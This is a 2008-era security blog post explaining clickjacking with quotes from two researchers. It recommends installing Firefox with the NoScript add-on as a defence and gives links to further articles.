Clickjacking is one of the newest and most dangerous web browser vulnerabilities discovered to date. Every browser is vulnerable, even those that can defend against the similar Cross Site Request Forgery (CSRF) vulnerability.
Clickjacking can be used to completely control your home PC or your home router, which can lead to a complete compromise of your private information and turn your PC into the latest conscript in a bot army.
How clickjacking works: when you visit a compromised web site, your browser loads an invisible button that hovers below the mouse pointer. When you visit a legitimate site like online banking or e-mail, when you click on a link, you’re actually clicking the invisible button placed there by the malicious code. As explained by Jeremiah Grossman, CEO of Whitehat Security:
“Think of any button on any Web site, internal or external, that you can get to appear between the browser walls. Wire transfers on banks, Digg buttons, CPC advertising banners, Netflix queue, etc. The list is virtually endless and these are relatively harmless examples. Next, consider that an attack can invisibly hover these buttons below the users’ mouse, so that when they click on something they visually see, they actually are clicking on something the attacker wants them to.”
Here is another example that is described by Robert Hansen, founder of SecTheory LLC:
“Say you have a home wireless router that you had authenticated prior to going to a [legitimate] Web site. “[The attacker] could place a tag under your mouse that frames in a single button an order to the router to, for example, delete all firewall rules. That would give them an advantage in an attack.”
In other words, an attacker can do pretty much anything that he or she wants to. He would have the same level of control as if he physically stole your computer.
So, short of turning off your PC, how can you defend against clickjacking?
Firefox and NoScript. Unless you have been living under a rock, you know about Firefox, the popular browser from Mozilla. NoScript is a popular Firefox add-on that was originally designed to help the user block javascript and Flash animation from selected web site (such as advertising). NoScript, starting in version 1.8.2.1, blocks all clickjacking attacks as well.
Where to get Firefox: go here, to www.getfirefox.com
IE users – take heart: during installation, Firefox can import all of your hard-won and well organized favorites, automatically.
After you have installed Firefox, install NoScript by going here: www.noscript.net
Articles on clickjacking and the Firefox / NoScript defense:
http://www.networkworld.com/news/2008/092608-security-researchers-warn-of-new.html
http://www.networkworld.com/news/2008/100808-firefox-extension-blocks-dangerous-web.html
http://en.wikipedia.org/wiki/Clickjacking
NoScript was one of PC World’s best products of the year, ranked at #52. I have used NoScript for a few years now and really appreciate its ability to block all foreign scripting, allowing only what I want to see.
Clickjacking is not a vulnerability that can be fixed on web sites. This is strictly a browser vulnerability that can only be fixed by fixing the browser itself. Reportedly the major browser makers (Microsoft, Mozilla, and Apple) are working on it. But don’t hold your breath – fixes are not likely to be released soon. Until then, Firefox with NoScript is the only available defense.
Peter H. Gregory 
Pingback: Include safe computing in your list of New Years Resolutions « Securitas Operandi™